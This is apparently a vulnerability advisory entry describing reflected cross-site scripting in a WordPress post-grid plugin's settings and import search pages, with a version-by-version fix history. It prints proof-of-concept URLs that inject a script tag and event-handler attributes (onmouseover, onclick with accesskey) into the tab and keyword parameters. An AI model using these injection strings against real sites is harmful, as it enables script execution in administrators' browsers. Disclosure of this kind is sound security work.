The slider import search feature and tab parameter of the plugin settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script> https://example.com/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)// v 2.1.4 partially fixed the issue, still allowing arbitrary attributes to be injected, ie https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="+accesskey=X+onclick=alert(1)// v2.1.5 removed a lot of escaping done in 2.1.4, and was put back in v2.1.8
0xB9
Yes
2021-06-28 (about 1 years ago)
2021-06-28 (about 1 years ago)
2022-01-02 (about 1 years ago)